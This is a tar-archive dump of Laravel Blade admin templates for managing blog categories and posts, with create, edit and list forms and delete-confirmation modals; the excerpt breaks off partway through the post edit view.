</select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/blog/category/edit.blade.php������������������������������������������������������������0000644�����������������00000006546�14765366573�0014276 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_category') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('blog-category.update', $category->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" value="{{ $category->category_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $category->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $category->status === 1 ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="0" {{ $category->status === 0 ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection����������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/blog/post/create.blade.php��������������������������������������������������������������0000644�����������������00000034102�14765366573�0013751 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_blog') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/blog-style1.jpg') }}" alt="draft image"> </div> </h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('blog.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input id="title" name="title" type="text" class="form-control" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea id="summernote" name="description" class="form-control"></textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="meta_description" name="meta_description" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control"></textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.use_special_breadcrumb') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes">{{ __('content.yes') }}</option> <option value="no">{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach($categories as $category) <option value="{{$category->id}}">{{$category->category_name}}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="short_description">{{ __('content.short_description') }}</label> <textarea id="short_description" name="short_description" class="form-control" rows="3"></textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="tag-list">{{ __('content.tag') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="tag-list" name="tag" class="form-control"></textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="type" class="col-form-label">{{ __('content.author') }} </label> <select class="form-control" name="type" id="type"> <option value="with_this_account" selected>{{ __('content.select_your_option') }}</option> <option value="with_this_account">{{ __('content.with_this_account') }}</option> <option value="anonymous">{{ __('content.anonymous') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="image">{{ __('content.image') }} ({{ __('content.size') }} 600 x 400)(.svg, .png, .jpg, .jpeg)</label> <input id="image" name="section_image" type="file" class="form-control-file"> <small id="image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="image">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600)(.svg, .png, .jpg, .jpeg)</label> <input id="image" name="section_image_2" type="file" class="form-control-file"> <small id="image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="image_status" class="col-form-label">{{ __('content.image_status') }} </label> <select class="form-control" name="image_status" id="image_status"> <option value="show" selected>{{ __('content.select_your_option') }}</option> <option value="show">{{ __('content.show') }}</option> <option value="hide">{{ __('content.hide') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/blog/post/index.blade.php���������������������������������������������������������������0000644�����������������00000063010�14765366573�0013615 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.blogs') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/blog-style1.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#blogSectionModal">{{ __('content.section_title_and_description') }}</button> <a href="{{ url('admin/blog/create') }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_blog') }}</a> </div> </div> @if (count($blogs) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('blog.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.image') }}</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.category') }}</th> <th>{{ __('content.post_date') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($blogs); $asc=0; @endphp @foreach ($blogs as $blog) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $blog->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td> @if (!empty($blog->section_image)) <img class="image-size img-fluid" src="{{ asset('uploads/img/blog/thumbnail/'.$blog->section_image) }}" alt="blog image"> @else <img class="image-size img-fluid" src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image"> @endif </td> <td>{{ $blog->title }}</td> <td><span class="badge badge-pill badge-dark">@if (isset($blog->category->category_name)) {{ $blog->category->category_name }} @else {{ $blog->category_name }} @endif</span></td> <td>{{ Carbon\Carbon::parse($blog->created_at)->format('d.m.Y') }}</td> <td>{{ $blog->order }}</td> <td> @if ($blog->status == "published") <span class="badge badge-pill badge-success">{{ __('content.published') }}</span> @else <span class="badge badge-pill badge-danger">{{ __('content.draft') }}</span> @endif </td> <td> <div> <a href="{{ route('blog.edit', $blog->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $blog->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $blog->id }}" tabindex="-1" role="dialog" aria-labelledby="blogModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="blogModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('blog.destroy', $blog->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="blogSectionModal" tabindex="-1" role="dialog" aria-labelledby="blogSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="blogSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($blog_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('blog-section.update', $blog_section->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $blog_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $blog_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }} </label> <input id="button_name" name="button_name" type="text" class="form-control" value="{{ $blog_section->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input id="button_url" name="button_url" type="text" class="form-control" value="{{ $blog_section->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }} <span class="text-red">*</span></label> <input type="number" name="section_item" class="form-control" id="section_item" value="{{ $blog_section->section_item }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }} <span class="text-red">*</span></label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="{{ $blog_section->paginate_item }}" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#blogSectionDestroyModal{{ $blog_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="blogSectionDestroyModal{{ $blog_section->id }}" tabindex="-1" role="dialog" aria-labelledby="blogSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="blogSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('blog-section.destroy', $blog_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('blog-section.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }} </label> <input id="button_name" name="button_name" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input id="button_url" name="button_url" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }} <span class="text-red">*</span></label> <input type="number" name="section_item" class="form-control" id="section_item" value="3" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }} <span class="text-red">*</span></label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="12" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/blog/post/edit.blade.php����������������������������������������������������������������0000644�����������������00000062157�14765366573�0013446 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_blog') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/blog-style1.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('blog.update', $blog->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input id="title" name="title" type="text" class="form-control" value="{{ $blog->title }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea id="summernote" name="description" class="form-control">@php echo html_entity_decode($blog->description); @endphp</textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="title" name="meta_description" type="text" class="form-control" value="{{ $blog->meta_description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control">{{ $blog->meta_keyword }}</textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.use_special_breadcrumb') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes" {{ $blog->breadcrumb_status == 'yes' ? 'selected' : '' }}>{{ __('content.yes') }}</option> <option value="no" {{ $blog->breadcrumb_status == 'no' ? 'selected' : '' }}>{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($blog->custom_breadcrumb_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/blog/breadcrumb/'.$blog->custom_breadcrumb_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category" class="col-form-label">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach ($categories as $category) <option value="{{ $category->id}}" {{ $category->id == $blog->category_id ? 'selected' : '' }}>{{ $category->category_name }}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="short_description">{{ __('content.short_description') }}</label> <textarea id="short_description" name="short_description" class="form-control" rows="3">{{ $blog->short_description }}</textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="tag-list">{{ __('content.tag') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="tag-list" name="tag" class="form-control">{{ $blog->tag }}</textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="type" class="col-form-label">{{ __('content.author') }} </label> <select class="form-control" name="type" id="type"> <option value="with_this_account" selected>{{ __('content.select_your_option') }}</option> <option value="with_this_account" {{ $blog->type == "with_this_account" ? 'selected' : '' }}>{{ __('content.with_this_account') }}</option> <option value="anonymous" {{ $blog->type == "anonymous" ? 'selected' : '' }}>{{ __('content.anonymous') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 600 x 400) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($blog->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/blog/thumbnail/'.$blog->section_image) }}" alt="blog image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($blog->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $blog->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image_2" class="form-control-file" id="section_image_2"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($blog->section_image_2)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/blog/'.$blog->section_image_2) }}" alt="blog image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($blog->section_image_2)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal2{{ $blog->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="image_status" class="col-form-label">{{ __('content.image_status') }}</label> <select class="form-control" name="image_status" id="image_status"> <option value=show" selected>{{ __('content.select_your_option') }}</option> <option value="show" {{ $blog->image_status == "show" ? 'selected' : '' }}>{{ __('content.show') }}</option> <option value="hide" {{ $blog->image_status == "hide" ? 'selected' : '' }}>{{ __('content.hide') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $blog->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $blog->status == "published" ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $blog->status == "draft" ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $blog->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ 